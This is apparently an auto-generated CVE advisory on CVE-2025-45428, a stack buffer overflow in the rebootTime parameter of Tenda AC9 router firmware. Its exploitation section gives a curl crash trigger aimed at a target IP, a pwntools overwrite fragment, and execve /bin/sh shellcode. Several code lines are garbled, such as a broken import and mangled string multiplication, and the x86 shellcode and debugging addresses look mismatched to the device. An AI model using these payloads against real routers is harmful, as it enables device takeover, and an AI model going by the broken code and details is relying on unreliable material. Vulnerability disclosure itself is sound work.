How the CVE-2025-45428 Works
The vulnerability exists in the `rebootTime` parameter of the `/goform/SetSysAutoRebbotCfg` endpoint in Tenda AC9 firmware v1.0 (V15.03.05.14_multi). Due to insufficient input validation, an attacker can send an excessively long string to the `rebootTime` field, triggering a stack-based buffer overflow. This overflow corrupts memory and allows arbitrary code execution with root privileges. The flaw occurs because the firmware fails to enforce proper bounds checking before copying user-supplied data into a fixed-size buffer. Remote exploitation is possible via unauthenticated HTTP requests.
DailyCVE Form
Platform: Tenda AC9
Version: V15.03.05.14_multi
Vulnerability: Stack Overflow
Severity: Critical
Date: 04/23/2025
What Undercode Say:
Exploitation Analysis
1. Crash Trigger:
curl -X POST "http://<TARGET_IP>/goform/SetSysAutoRebbotCfg" -d "rebootTime=$(python -c 'print("A"500)')"
2. ROP Chain Setup:
from pwn import payload = b"A"264 + p32(0xdeadbeef) Example overwrite
3. Shellcode Injection:
shellcode = b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
Protection Measures
1. Firmware Update:
wget https://www.tenda.com.cn/download/firmware/AC9_V15.03.05.15_multi.bin
2. Input Sanitization:
if (strlen(rebootTime) > 64) { exit(1); }
3. Network Mitigation:
iptables -A INPUT -p tcp --dport 80 -j DROP
Debugging Commands
1. GDB Analysis:
gdb-multiarch -q ./httpd --ex "set follow-fork-mode child" --ex "b 0x08048A12"
2. Memory Dump:
dd if=/dev/mem bs=1 skip=$((0x08048000)) count=4096
3. Exploit Check:
checksec --file=/usr/bin/httpd
References
No additional commentary beyond technical details.
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
